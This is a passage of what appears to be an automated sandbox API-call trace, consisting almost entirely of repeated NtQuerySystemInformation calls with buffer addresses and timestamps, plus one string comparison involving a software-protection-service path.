(SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x28, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0283.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x48, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf50, Length=0x48, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x28, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x40, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0283.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0283.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.439] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce20, Length=0x50, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd10, Length=0x50, ResultLength=0x0) [0283.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.443] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca70, Length=0x28, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cae0, Length=0x28, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0283.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.450] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x28, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.451] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca40, Length=0x20, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x38, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cac0, Length=0x20, ResultLength=0x0) [0283.452] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca50, Length=0x20, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.453] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0283.454] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.454] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ced0, Length=0x50, ResultLength=0x0) [0283.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.455] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x28, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cca0, Length=0x28, ResultLength=0x0) [0283.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.461] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x28, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.468] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x20, ResultLength=0x0) [0283.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0283.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x20, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0283.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce00, Length=0x38, ResultLength=0x0) [0283.485] 